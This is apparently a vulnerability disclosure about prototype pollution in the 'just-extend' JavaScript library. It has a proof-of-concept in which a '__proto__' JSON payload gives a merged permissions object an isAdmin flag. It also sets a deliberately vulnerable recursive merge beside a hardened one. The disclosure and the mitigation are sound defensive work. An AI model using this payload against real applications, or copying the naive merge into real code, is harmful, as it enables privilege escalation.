Description
POC:
```javascript
import extend from 'just-extend';

const defaultPermissions = {
  read: true,
  write: false,
  delete: false,
};

// JSON.parse creates an own, enumerable property literally named "__proto__"
// (it does not set the prototype), so the key survives into the merge.
const payload = JSON.parse('{"__proto__": { "isAdmin": true }}');

// When the merge copies that key by plain assignment (target["__proto__"] = value),
// JavaScript treats it as a prototype write, so the result object inherits
// isAdmin instead of receiving it as an ordinary property.
const userPermissions = extend({}, defaultPermissions, payload);

console.log('User Permissions:', userPermissions);
console.log(userPermissions['isAdmin']); // inherited through the poisoned prototype

if (userPermissions.isAdmin) {
  console.log('User has admin access');
} else {
  console.log('User does not have admin access');
}
```
This code demonstrates how prototype poisoning occurs when an attacker-controlled object containing a `__proto__` key is merged with the default permissions through the `extend()` call above. The `isAdmin` property is not copied as an own property; it is injected into the result object's prototype, so `userPermissions.isAdmin` evaluates to `true` even though it was never part of the defaults.
- Unauthorized Access: Users can gain elevated permissions without proper authorization.
- Security Breach: Compromised data integrity and potential for privilege escalation.
- Inconsistent Behavior: Application logic relying on permissions can be bypassed, leading to unpredictable behavior and security vulnerabilities.
Mitigation
- Specifically check for, and skip or reject, the keys `__proto__`, `prototype` and `constructor` before copying any key from a source object, and never recurse into an inherited property of the target.
Since this library has a lot of weekly downloads, there may be many dependent use cases affected by this bug.
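To make the mechanism and the mitigation above concrete without depending on the library, here is an added example (my own code, not part of this issue or of the library) with a naive recursive merge beside a hardened one. `naiveDeepMerge`, `safeDeepMerge`, `UNSAFE_KEYS`, `isPlainObject` and `demo` are names chosen for this illustration, and the payload is constructed to mirror the PoC. The naive version goes one step further than the PoC: because it recurses into `target["__proto__"]`, which resolves to `Object.prototype`, the `isAdmin` flag lands on every object in the process, not just on the merge result.

```javascript
// Added example: vulnerable recursive merge vs. a hardened one. Not library code.
const UNSAFE_KEYS = new Set(['__proto__', 'prototype', 'constructor']);

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Vulnerable: walks every own key of `source` and recurses into nested objects.
// For the key "__proto__", target[key] is the inherited Object.prototype, which
// looks like a plain object, so the recursion writes straight into it.
function naiveDeepMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (isPlainObject(value)) {
      if (!isPlainObject(target[key])) target[key] = {};
      naiveDeepMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: drop the three dangerous keys outright, and only ever recurse into
// a property the target actually owns, never into one it inherits.
function safeDeepMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (UNSAFE_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const ownsNested =
        Object.prototype.hasOwnProperty.call(target, key) && isPlainObject(target[key]);
      if (!ownsNested) target[key] = {};
      safeDeepMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Runs the PoC scenario against a merge function and reports what an
// authorization check would see. Cleans up Object.prototype afterwards so
// that one run cannot influence the next.
function demo(mergeFn) {
  const defaults = { read: true, write: false, delete: false };
  // Constructed attacker input: a legitimate override plus the poisoning key.
  const payload = JSON.parse('{"write": true, "__proto__": {"isAdmin": true}}');

  const perms = mergeFn(mergeFn({}, defaults), payload);
  const result = {
    write: perms.write,
    isAdmin: perms.isAdmin === true,
    hasOwnIsAdmin: Object.prototype.hasOwnProperty.call(perms, 'isAdmin'),
    globalPolluted: ({}).isAdmin === true,
  };

  delete Object.prototype.isAdmin;
  return result;
}

console.log('naive:', demo(naiveDeepMerge));
console.log('safe: ', demo(safeDeepMerge));
```

In the naive run `isAdmin` is `true` while `hasOwnIsAdmin` is `false`, which is the tell-tale sign of pollution: the flag is inherited, not stored. The hardened merge still applies the legitimate `write` override, so the fix costs nothing in normal use. An alternative defence is to build the result with `Object.create(null)`, where `__proto__` is an ordinary key, but the key filter is the change most callers can apply without touching every consumer of the merged object.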